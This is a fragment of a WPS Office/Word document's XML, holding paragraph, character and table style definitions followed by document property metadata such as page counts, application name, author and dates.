    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="12">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="8"/>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8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun"/>
      <w:color w:val="0000FF"/>
      <w:sz w:val="24"/>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8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="17">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="320"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="666666"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="18">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able of figures"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:leftChars="200" w:hanging="200" w:hangingChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:r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table" w:customStyle="1" w:styleId="23">
    <w:name w:val="TableNormal"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="24">
    <w:name w:val="WPSOffice手动目录 1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
      <w:ind w:leftChars="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="25">
    <w:name w:val="WPSOffice手动目录 2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
      <w:ind w:leftChars="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="26">
    <w:name w:val="WPSOffice手动目录 3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:beforeLines="50" w:afterLines="50" w:line="276" w:lineRule="auto"/>
      <w:ind w:leftChars="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="27">
    <w:name w:val="_Style 12"/>
    <w:basedOn w:val="23"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="100" w:type="dxa"/>
        <w:left w:w="100" w:type="dxa"/>
        <w:bottom w:w="100" w:type="dxa"/>
        <w:right w:w="100" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="28">
    <w:name w:val="Heading 4 Char"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:i/>
      <w:color w:val="666666"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="29">
    <w:name w:val="Heading 5 Char"/>
    <w:link w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>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12</Pages>
  <Words>1203</Words>
  <Characters>7641</Characters>
  <TotalTime>18</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>8994</CharactersWithSpaces>
  <Application>WPS Office_12.2.0.21936_F1E327BC-269C-435d-A152-05C5408002CA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2025-07-26T00:07:00Z</dcterms:created>
  <dc:creator>Mohammed</dc:creator>
  <cp:lastModifiedBy>For Google</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-06T18:55:29Z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2EDF9F0A30004D47BFBCE660CA541B7C_13</vt:lpwstr>
  </property>
</Properties>
</file>